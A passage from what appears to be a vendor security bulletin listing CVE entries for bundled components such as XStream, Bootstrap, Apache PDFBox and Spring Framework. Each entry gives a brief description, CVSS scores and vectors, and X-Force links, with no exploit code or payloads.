(CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N) \n \n** CVEID: **[CVE-2022-21248](<https://vulners.com/cve/CVE-2022-21248>) \n** DESCRIPTION: **An unspecified vulnerability in Java SE related to the Serialization component could allow an unauthenticated attacker to cause no confidentiality impact, low integrity impact, and no availability impact. \nCVSS Base score: 3.7 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/217543](<https://exchange.xforce.ibmcloud.com/vulnerabilities/217543>) for the current score. \nCVSS Vector: (CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:L/A:N) \n \n** CVEID: **[CVE-2021-36373](<https://vulners.com/cve/CVE-2021-36373>) \n** DESCRIPTION: **Apache Ant is vulnerable to a denial of service, caused by an out-of-memory error when large amounts of memory are allocated. By persuading a victim to open a specially-crafted TAR archive, a remote attacker could exploit this vulnerability to cause the application to crash. \nCVSS Base score: 5.5 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/205311](<https://exchange.xforce.ibmcloud.com/vulnerabilities/205311>) for the current score. \nCVSS Vector: (CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H) \n \n** CVEID: **[CVE-2012-2098](<https://vulners.com/cve/CVE-2012-2098>) \n** DESCRIPTION: **Apache Commons Compress and Apache Ant are vulnerable to a denial of service, caused by an error when using bzip2 compression to compress files. By passing specially-crafted input to the BZip2CompressorOutputStream class, a remote attacker could exploit this vulnerability to consume all available resources. \nCVSS Base score: 5 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/75857](<https://exchange.xforce.ibmcloud.com/vulnerabilities/75857>) for the current score. \nCVSS Vector: (AV:N/AC:L/Au:N/C:N/I:N/A:P) \n \n** CVEID: **[CVE-2021-31811](<https://vulners.com/cve/CVE-2021-31811>) \n** DESCRIPTION: **Apache PDFBox is vulnerable to a denial of service, caused by an out-of-memory exception while loading a file. By persuading a victim to open a specially-crafted PDF file, a remote attacker could exploit this vulnerability to cause a denial of service. \nCVSS Base score: 5.5 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/203615](<https://exchange.xforce.ibmcloud.com/vulnerabilities/203615>) for the current score. \nCVSS Vector: (CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H) \n \n** CVEID: **[CVE-2021-31812](<https://vulners.com/cve/CVE-2021-31812>) \n** DESCRIPTION: **Apache PDFBox is vulnerable to a denial of service, caused by an error while loading a file. By persuading a victim to open a specially-crafted PDF file, a remote attacker could exploit this vulnerability to cause the system to enter into an infinite loop. \nCVSS Base score: 5.5 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/203587](<https://exchange.xforce.ibmcloud.com/vulnerabilities/203587>) for the current score. \nCVSS Vector: (CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H) \n \n** CVEID: **[CVE-2021-27906](<https://vulners.com/cve/CVE-2021-27906>) \n** DESCRIPTION: **Apache PDFBox is vulnerable to a denial of service, caused by an OutOfMemory-Exception flaw. By persuading a victim to open a specially-crafted .PDF file, a remote attacker could exploit this vulnerability to cause the application to crash. \nCVSS Base score: 5.5 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/198452](<https://exchange.xforce.ibmcloud.com/vulnerabilities/198452>) for the current score. \nCVSS Vector: (CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H) \n \n** CVEID: **[CVE-2021-27807](<https://vulners.com/cve/CVE-2021-27807>) \n** DESCRIPTION: **Apache PDFBox is vulnerable to a denial of service, caused by an infinite loop flaw. By persuading a victim to open a specially-crafted .PDF file, a remote attacker could exploit this vulnerability to cause the application to crash. \nCVSS Base score: 5.5 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/198451](<https://exchange.xforce.ibmcloud.com/vulnerabilities/198451>) for the current score. \nCVSS Vector: (CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H) \n \n** CVEID: **[CVE-2022-22950](<https://vulners.com/cve/CVE-2022-22950>) \n** DESCRIPTION: **VMware Tanzu Spring Framework is vulnerable to a denial of service, caused by improper input validation. By sending a specially-crafted crafted SpEL expression, a remote attacker could exploit this vulnerability to cause a denial of service condition. \nCVSS Base score: 5.4 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/223096](<https://exchange.xforce.ibmcloud.com/vulnerabilities/223096>) for the current score. \nCVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:L/A:L) \n \n** CVEID: **[CVE-2019-12415](<https://vulners.com/cve/CVE-2019-12415>) \n** DESCRIPTION: **Apache POI could allow a remote attacker to obtain sensitive information, caused by an XML external entity (XXE) error when processing XML data by tool XSSFExportToXml. By sending a specially-crafted document, a remote attacker could exploit this vulnerability to obtain sensitive information. \nCVSS Base score: 5.3 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/170015](<https://exchange.xforce.ibmcloud.com/vulnerabilities/170015>) for the current score. \nCVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N) \n \n** CVEID: **[CVE-2018-14040](<https://vulners.com/cve/CVE-2018-14040>) \n** DESCRIPTION: **Bootstrap is vulnerable to cross-site scripting, caused by improper validation of user-supplied input by the collapse data-parent attribute. A remote attacker could exploit this vulnerability to execute script in a victim's Web browser within the security context of the hosting Web site. An attacker could use this vulnerability to steal the victim's cookie-based authentication credentials. \nCVSS Base score: 6.1 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/146468](<https://exchange.xforce.ibmcloud.com/vulnerabilities/146468>) for the current score. \nCVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N) \n \n** CVEID: **[CVE-2016-10735](<https://vulners.com/cve/CVE-2016-10735>) \n** DESCRIPTION: **Bootstrap is vulnerable to cross-site scripting, caused by improper validation of user-supplied input by the data-target attribute. A remote attacker could exploit this vulnerability to execute script in a victim's Web browser within the security context of the hosting Web site. An attacker could use this vulnerability to steal the victim's cookie-based authentication credentials. \nCVSS Base score: 6.1 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/155339](<https://exchange.xforce.ibmcloud.com/vulnerabilities/155339>) for the current score. \nCVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N) \n \n** CVEID: **[CVE-2019-8331](<https://vulners.com/cve/CVE-2019-8331>) \n** DESCRIPTION: **Bootstrap is vulnerable to cross-site scripting, caused by improper validation of user-supplied input by the tooltip or popover data-template. A remote attacker could exploit this vulnerability to execute script in a victim's Web browser within the security context of the hosting Web site. An attacker could use this vulnerability to steal the victim's cookie-based authentication credentials. \nCVSS Base score: 6.1 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/157409](<https://exchange.xforce.ibmcloud.com/vulnerabilities/157409>) for the current score. \nCVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N) \n \n** CVEID: **[CVE-2018-14042](<https://vulners.com/cve/CVE-2018-14042>) \n** DESCRIPTION: **Bootstrap is vulnerable to cross-site scripting, caused by improper validation of user-supplied input by the data-container property of tooltip. A remote attacker could exploit this vulnerability to execute script in a victim's Web browser within the security context of the hosting Web site. An attacker could use this vulnerability to steal the victim's cookie-based authentication credentials. \nCVSS Base score: 6.1 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/146466](<https://exchange.xforce.ibmcloud.com/vulnerabilities/146466>) for the current score. \nCVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N) \n \n** CVEID: **[CVE-2018-20676](<https://vulners.com/cve/CVE-2018-20676>) \n** DESCRIPTION: **Bootstrap is vulnerable to cross-site scripting, caused by improper validation of user-supplied input by the tooltip data-viewport attribute. A remote attacker could exploit this vulnerability to execute script in a victim's Web browser within the security context of the hosting Web site. An attacker could use this vulnerability to steal the victim's cookie-based authentication credentials. \nCVSS Base score: 6.1 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/155338](<https://exchange.xforce.ibmcloud.com/vulnerabilities/155338>) for the current score. \nCVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N) \n \n** CVEID: **[CVE-2018-20677](<https://vulners.com/cve/CVE-2018-20677>) \n** DESCRIPTION: **Bootstrap is vulnerable to cross-site scripting, caused by improper validation of user-supplied input by the affix configuration target property. A remote attacker could exploit this vulnerability to execute script in a victim's Web browser within the security context of the hosting Web site. An attacker could use this vulnerability to steal the victim's cookie-based authentication credentials. \nCVSS Base score: 6.1 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/155337](<https://exchange.xforce.ibmcloud.com/vulnerabilities/155337>) for the current score. \nCVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N) \n \n** CVEID: **[CVE-2019-10202](<https://vulners.com/cve/CVE-2019-10202>) \n** DESCRIPTION: **Red Hat JBoss Enterprise Application Platform (EAP) could allow a remote attacker to execute arbitrary code on the system, caused by improper deserialization in Codehaus. By sending a specially-crafted request, an attacker could exploit this vulnerability to execute arbitrary code on the system. \nCVSS Base score: 8.1 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/168251](<https://exchange.xforce.ibmcloud.com/vulnerabilities/168251>) for the current score. \nCVSS Vector: (CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H) \n \n** CVEID: **[CVE-2021-39145](<https://vulners.com/cve/CVE-2021-39145>) \n** DESCRIPTION: **XStream could allow a remote authenticated attacker to execute arbitrary code on the system, caused by an unsafe deserialization flaw. By manipulating the processed input stream, an attacker could exploit this vulnerability to execute arbitrary code on the system. \nCVSS Base score: 8.5 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/208113](<https://exchange.xforce.ibmcloud.com/vulnerabilities/208113>) for the current score. \nCVSS Vector: (CVSS:3.0/AV:N/AC:H/PR:L/UI:N/S:C/C:H/I:H/A:H) \n \n** CVEID: **[CVE-2020-26217](<https://vulners.com/cve/CVE-2020-26217>) \n** DESCRIPTION: **XStream could allow a remote attacker to execute arbitrary code on the system, caused by flaws in the XStream.java and SecurityVulnerabilityTest.java scripts. By manipulating the processed input stream, an attacker could exploit this vulnerability to execute arbitrary code on the system. \nCVSS Base score: 7.3 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/192210](<https://exchange.xforce.ibmcloud.com/vulnerabilities/192210>) for the current score. \nCVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L) \n \n** CVEID: **[CVE-2021-39140](<https://vulners.com/cve/CVE-2021-39140>) \n** DESCRIPTION: **XStream is vulnerable to a denial of service, caused by an infinite loop flaw. By manipulating the processed input stream, a remote authenticated attacker could exploit this vulnerability to allocate 100% CPU time on the target system, and results in a denial of service condition. \nCVSS Base score: 6.5 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/208110](<https://exchange.xforce.ibmcloud.com/vulnerabilities/208110>) for the current score. \nCVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H) \n \n** CVEID: **[CVE-2021-29505](<https://vulners.com/cve/CVE-2021-29505>) \n** DESCRIPTION: **XStream XStream could allow a remote authenticated attacker to execute arbitrary commands on the system, caused by improper input validation. By manipulating the processed input stream, an attacker could exploit this vulnerability to execute arbitrary commands on the system. \nCVSS Base score: 8.8 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/202795](<https://exchange.xforce.ibmcloud.com/vulnerabilities/202795>) for the current score. \nCVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H) \n \n** CVEID: **[CVE-2021-39144](<https://vulners.com/cve/CVE-2021-39144>) \n** DESCRIPTION: **XStream could allow a remote authenticated attacker to execute arbitrary commands on the system, caused by an unsafe deserialization flaw. By manipulating the processed input stream, an attacker could exploit this vulnerability to execute arbitrary commands on the system. \nCVSS Base score: 8.5 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/208112](<https://exchange.xforce.ibmcloud.com/vulnerabilities/208112>) for the current score. \nCVSS Vector: (CVSS:3.0/AV:N/AC:H/PR:L/UI:N/S:C/C:H/I:H/A:H) \n \n** CVEID: **[CVE-2021-39149](<https://vulners.com/cve/CVE-2021-39149>) \n** DESCRIPTION: **XStream could allow a remote authenticated attacker to execute arbitrary code on the system, caused by an unsafe deserialization flaw. By manipulating the processed input stream, an attacker could exploit this vulnerability to execute arbitrary code on the system. \nCVSS Base score: 8.5 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/208117](<https://exchange.xforce.ibmcloud.com/vulnerabilities/208117>) for the current score. \nCVSS Vector: (CVSS:3.0/AV:N/AC:H/PR:L/UI:N/S:C/C:H/I:H/A:H) \n \n** CVEID: **[CVE-2021-21348](<https://vulners.com/cve/CVE-2021-21348>) \n** DESCRIPTION: **XStream is vulnerable to a denial of service, caused by a regular expression denial of service flaw (ReDos). By using a specially-crafted regular expression input, a remote attacker could exploit this vulnerability to consume maximum CPU time. \nCVSS Base score: 5.9 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/198625](<https://exchange.xforce.ibmcloud.com/vulnerabilities/198625>) for the current score. \nCVSS Vector: (CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:N/A:H) \n \n** CVEID: **[CVE-2021-39151](<https://vulners.com/cve/CVE-2021-39151>) \n** DESCRIPTION: **XStream could allow a remote authenticated attacker to execute arbitrary code on the system, caused by an unsafe deserialization flaw. By manipulating the processed input stream, an attacker could exploit this vulnerability to execute arbitrary code on the system. \nCVSS Base score: 8.5 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/208119](<https://exchange.xforce.ibmcloud.com/vulnerabilities/208119>) for the current score. \nCVSS Vector: (CVSS:3.0/AV:N/AC:H/PR:L/UI:N/S:C/C:H/I:H/A:H) \n \n** CVEID: **[CVE-2021-21344](<https://vulners.com/cve/CVE-2021-21344>) \n** DESCRIPTION: **XStream could allow a remote attacker to execute arbitrary code on the system, caused by a flaw when processing stream at unmarshalling time. By manipulating the processed input stream and replace or inject objects, an attacker could exploit this vulnerability to execute arbitrary code from a remote server. \nCVSS Base score: 9.8 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/198621](<https://exchange.xforce.ibmcloud.com/vulnerabilities/198621>) for the current score. \nCVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H) \n \n** CVEID: **[CVE-2021-21342](<https://vulners.com/cve/CVE-2021-21342>) \n** DESCRIPTION: **XStream is vulnerable to server-side request forgery, caused by a flaw when processing stream at unmarshalling time. By manipulating the processed input stream and replace or inject objects, an attacker could exploit this vulnerability to conduct SSRF attack o access data streams from an arbitrary URL referencing a resource in an intranet or the local host. \nCVSS Base score: 7.4 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/198619](<https://exchange.xforce.ibmcloud.com/vulnerabilities/198619>) for the current score. \nCVSS Vector: (CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:N) \n \n** CVEID: **[CVE-2021-21343](<https://vulners.com/cve/CVE-2021-21343>) \n** DESCRIPTION: **XStream could allow a remote attacker to bypass security restrictions, caused by a flaw when processing stream at unmarshalling time. By manipulating the processed input stream and replace or inject objects, an attacker could exploit this vulnerability to delete arbitrary files on the system. \nCVSS Base score: 5.3 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/198620](<https://exchange.xforce.ibmcloud.com/vulnerabilities/198620>) for the current score. \nCVSS Vector: (CVSS:3.0/AV:N/AC:H/PR:N/UI:R/S:U/C:N/I:H/A:N) \n \n** CVEID: **[CVE-2020-26258](<https://vulners.com/cve/CVE-2020-26258>) \n** DESCRIPTION: **XStream is vulnerable to server-side request forgery, caused by a flaw when unmarshalling. By manipulating the processed input stream, a remote attacker could exploit this vulnerability to obtain sensitive data. \nCVSS Base score: 7.5 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/193525](<https://exchange.xforce.ibmcloud.com/vulnerabilities/193525>) for the current score. \nCVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N) \n \n** CVEID: **[CVE-2021-39153](<https://vulners.com/cve/CVE-2021-39153>) \n** DESCRIPTION: **XStream could allow a remote authenticated attacker to execute arbitrary code on the system, caused by an unsafe deserialization flaw. By manipulating the processed input stream, an attacker could exploit this vulnerability to execute arbitrary code on the system. \nCVSS Base score: 8.5 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/208121](<https://exchange.xforce.ibmcloud.com/vulnerabilities/208121>) for the current score. \nCVSS Vector: (CVSS:3.0/AV:N/AC:H/PR:L/UI:N/S:C/C:H/I:H/A:H) \n \n** CVEID: **[CVE-2021-39141](<https://vulners.com/cve/CVE-2021-39141>) \n** DESCRIPTION: **XStream could allow a remote authenticated attacker to execute arbitrary code on the system, caused by an unsafe deserialization flaw. By manipulating the processed input stream, an attacker could exploit this vulnerability to execute arbitrary code on the system. \nCVSS Base score: 8.5 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/208111](<https://exchange.xforce.ibmcloud.com/vulnerabilities/208111>) for the current score. \nCVSS Vector: (CVSS:3.0/AV:N/AC:H/PR:L/UI:N/S:C/C:H/I:H/A:H) \n \n** CVEID: **[CVE-2021-39147](<https://vulners.com/cve/CVE-2021-39147>) \n** DESCRIPTION: **XStream could allow a remote authenticated attacker to execute arbitrary code on the system, caused by an unsafe deserialization flaw. By manipulating the processed input stream, an attacker could exploit this vulnerability to execute arbitrary code on the system. \nCVSS Base score: 8.5 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/208115](<https://exchange.xforce.ibmcloud.com/vulnerabilities/208115>) for the current score. \nCVSS Vector: (CVSS:3.0/AV:N/AC:H/PR:L/UI:N/S:C/C:H/I:H/A:H) \n \n** CVEID: **[CVE-2021-39148](<https://vulners.com/cve/CVE-2021-39148>) \n** DESCRIPTION: **XStream could allow a remote authenticated attacker to execute arbitrary code on the system, caused by an unsafe deserialization flaw. By manipulating the processed input stream, an attacker could exploit this vulnerability to execute arbitrary code on the system. \nCVSS Base score: 8.5 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/208116](<https://exchange.xforce.ibmcloud.com/vulnerabilities/208116>) for the current score. \nCVSS Vector: (CVSS:3.0/AV:N/AC:H/PR:L/UI:N/S:C/C:H/I:H/A:H) \n \n** CVEID: **[CVE-2021-21347](<https://vulners.com/cve/CVE-2021-21347>) \n** DESCRIPTION: **XStream could allow a remote attacker to execute arbitrary code on the system, caused by a flaw when processing stream at unmarshalling time. By manipulating the processed input stream and replace or inject objects, an attacker could exploit this vulnerability to execute arbitrary code on the system. \nCVSS Base score: 8.1 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/198624](<https://exchange.xforce.ibmcloud.com/vulnerabilities/198624>) for the current score. \nCVSS Vector: (CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H) \n \n** CVEID: **[CVE-2021-21345](<https://vulners.com/cve/CVE-2021-21345>) \n** DESCRIPTION: **XStream could allow a remote authenticated attacker to execute arbitrary commands on the system, caused by a flaw when processing stream at unmarshalling time. By manipulating the processed input stream and replace or inject objects, an attacker could exploit this vulnerability to execute arbitrary commands on the system. \nCVSS Base score: 8.5 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/198622](<https://exchange.xforce.ibmcloud.com/vulnerabilities/198622>) for the current score. \nCVSS Vector: (CVSS:3.0/AV:N/AC:H/PR:L/UI:N/S:C/C:H/I:H/A:H) \n \n** CVEID: **[CVE-2020-26259](<https://vulners.com/cve/CVE-2020-26259>) \n** DESCRIPTION: **XStream could allow a remote attacker to delete arbitrary files from the system, caused by improper input sanitization. By manipulating the processed input, an attacker could exploit this vulnerability to delete arbitrary files from the system. \nCVSS Base score: 7.5 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/193524](<https://exchange.xforce.ibmcloud.com/vulnerabilities/193524>) for the current score. \nCVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N) \n \n** CVEID: **[CVE-2021-39146](<https://vulners.com/cve/CVE-2021-39146>) \n** DESCRIPTION: **XStream could allow a remote authenticated attacker to execute arbitrary code on the system, caused by an unsafe deserialization flaw. By manipulating the processed input stream, an attacker could exploit this vulnerability to execute arbitrary code on the system. \nCVSS Base score: 8.5 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/208114](<https://exchange.xforce.ibmcloud.com/vulnerabilities/208114>) for the current score. \nCVSS Vector: (CVSS:3.0/AV:N/AC:H/PR:L/UI:N/S:C/C:H/I:H/A:H) \n \n** CVEID: **[CVE-2021-21349](<https://vulners.com/cve/CVE-2021-21349>) \n** DESCRIPTION: **XStream is vulnerable to server-side request forgery, caused by a flaw when processing stream at unmarshalling time. By manipulating the processed input stream and replace or inject objects, an attacker could exploit this vulnerability to conduct SSRF attack to access data streams from an arbitrary URL referencing a resource in an intranet or the local host. \nCVSS Base score: 8.7 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/198626](<https://exchange.xforce.ibmcloud.com/vulnerabilities/198626>) for the current score. \nCVSS Vector: (CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:C/C:H/I:H/A:N) \n \n** CVEID: **[CVE-2021-21350](<https://vulners.com/cve/CVE-2021-21350>) \n** DESCRIPTION: **XStream could allow a remote attacker to execute arbitrary code on the system, caused by a flaw when processing stream at unmarshalling time. By manipulating the processed input stream and replace or inject objects, an attacker could exploit this vulnerability to execute arbitrary code on the system. \nCVSS Base score: 8.1 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/198627](<https://exchange.xforce.ibmcloud.com/vulnerabilities/198627>) for the current score. \nCVSS Vector: (CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H) \n \n** CVEID: **[CVE-2021-21351](<https://vulners.com/cve/CVE-2021-21351>) \n** DESCRIPTION: **XStream could allow a remote attacker to execute arbitrary code on the system, caused by a flaw when processing stream at unmarshalling time. By manipulating the processed input stream and replace or inject objects, an attacker could exploit this vulnerability to execute arbitrary code on the system. \nCVSS Base score: 8.1 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/198628](<https://exchange.xforce.ibmcloud.com/vulnerabilities/198628>) for the current score. \nCVSS Vector: (CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H) \n \n** CVEID: **[CVE-2021-21346](<https://vulners.com/cve/CVE-2021-21346>) \n** DESCRIPTION: **XStream could allow a remote attacker to execute arbitrary code on the system, caused by a flaw when processing stream at unmarshalling time. By manipulating the processed input stream and replace or inject objects, an attacker could exploit this vulnerability to execute arbitrary code on the system. \nCVSS Base score: 7.5 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/198623](<https://exchange.xforce.ibmcloud.com/vulnerabilities/198623>) for the current score. \nCVSS Vector: (CVSS:3.0/AV:N/AC:H/PR:N/UI:R/S:U/C:H/I:H/A:H) \n \n** CVEID: **[CVE-2021-39154](<https://vulners.com/cve/CVE-2021-39154>) \n** DESCRIPTION: **XStream could allow a remote authenticated attacker to execute arbitrary code on the system, caused by an unsafe deserialization flaw. By manipulating the processed input stream, an attacker could exploit this vulnerability to execute arbitrary code on the system. \nCVSS Base score: 8.5 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/208122](<https://exchange.xforce.ibmcloud.com/vulnerabilities/208122>) for the current score. \nCVSS Vector: (CVSS:3.0/AV:N/AC:H/PR:L/UI:N/S:C/C:H/I:H/A:H) \n \n** CVEID: **[CVE-2021-21341](<https://vulners.com/cve/CVE-2021-21341>) \n** DESCRIPTION: **XStream is vulnerable to a denial of service, caused by an endless loop flaw when processing stream at unmarshalling time. By manipulating the processed input stream, a remote attacker could exploit this vulnerability to allocate 100% CPU time. \nCVSS Base score: 7.5 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/198618](<https://exchange.xforce.ibmcloud.com/vulnerabilities/198618>) for the current score. \nCVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H) \n \n** CVEID: **[CVE-2021-39150](<https://vulners.com/cve/CVE-2021-39150>) \n** DESCRIPTION: **XStream is vulnerable to server-side request forgery, caused by an unsafe deserialization flaw. By manipulating the processed input stream, an attacker could exploit this vulnerability to conduct SSRF attack to request data from internal resources. \nCVSS Base score: 8.5 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/208118](<https://exchange.xforce.ibmcloud.com/vulnerabilities/208118>) for the current score. \nCVSS Vector: (CVSS:3.0/AV:N/AC:H/PR:L/UI:N/S:C/C:H/I:H/A:H) \n \n** CVEID: **[CVE-2021-39152](<https://vulners.com/cve/CVE-2021-39152>) \n** DESCRIPTION: **XStream is vulnerable to server-side request forgery, caused by an unsafe deserialization flaw. By manipulating the processed input stream, an attacker could exploit this vulnerability to conduct SSRF attack to request data from internal resources. \nCVSS Base score: 8.5 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/208120](<https://exchange.xforce.ibmcloud.com/vulnerabilities/208120>) for the current score. \nCVSS Vector: (CVSS:3.0/AV:N/AC:H/PR:L/UI:N/S:C/C:H/I:H/A:H) \n \n** CVEID: **[CVE-2021-39139](<https://vulners.com/cve/CVE-2021-39139>) \n** DESCRIPTION: **XStream could allow a remote authenticated attacker to execute arbitrary code on the system, caused by an unsafe deserialization flaw. By manipulating the processed input stream, an attacker could exploit this vulnerability to execute arbitrary code on the system. \nCVSS Base score: 8.5 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/208108](<https://exchange.xforce.ibmcloud.com/vulnerabilities/208108>) for the current score. \nCVSS Vector: (CVSS:3.0/AV:N/AC:H/PR:L/UI:N/S:C/C:H/I:H/A:H) \n \n** CVEID: **[CVE-2021-43859](<https://vulners.com/cve/CVE-2021-43859>) \n** DESCRIPTION: **XStream is vulnerable to a denial of service, caused by improper input validation. By injecting highly recursive collections or maps, a remote attacker could exploit this vulnerability to allocate 100% CPU time on the system. \nCVSS Base score: 7.5 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/219177](<https://exchange.xforce.ibmcloud.com/vulnerabilities/219177>) for the current score. \nCVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H) \n \n** CVEID: **[CVE-2022-22965](<https://vulners.com/cve/CVE-2022-22965>) \n** DESCRIPTION: **Spring Framework could allow a remote attacker to execute arbitrary code on the system, caused by the improper handling of PropertyDescriptor objects used with data binding. By sending specially-crafted data to a Spring Java application, an attacker could exploit this vulnerability to execute arbitrary code on the system. Note: The exploit requires Spring Framework to be run on Tomcat as a WAR deployment with JDK 9 or higher using spring-webmvc or spring-webflux. Note: This vulnerability is also known as Spring4Shell or SpringShell. \nCVSS Base score: 9.8 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/223103](<https://exchange.xforce.ibmcloud.com/vulnerabilities/223103>) for the current score. \nCVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H) \n \n** CVEID: **[CVE-2021-28657](<https://vulners.com/cve/CVE-2021-28657>) \n** DESCRIPTION: **Apache Tika is vulnerable to a denial of service, caused by an infinite loop flaw in the MP3 parser. By persuading a victim to open a specially-crafted file, a remote attacker could exploit this vulnerability to cause the application to crash. \nCVSS Base score: 5.5 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/199112](<https://exchange.xforce.ibmcloud.com/vulnerabilities/199112>) for the current score. \nCVSS Vector: (CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H) \n \n** CVEID: **[CVE-2021-37714](<https://vulners.com/cve/CVE-2021-37714>) \n** DESCRIPTION: **jsoup is vulnerable to a denial of service, caused by improper input validation. By sending a specially-crafted input, a remote attacker could exploit this vulnerability to cause the HTML and XML parser to get stuck, timeout, or throw unchecked exceptions resulting in a denial of service condition. \nCVSS Base score: 7.5 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/207858](<https://exchange.xforce.ibmcloud.com/vulnerabilities/207858>) for the current score. \nCVSS Vector: 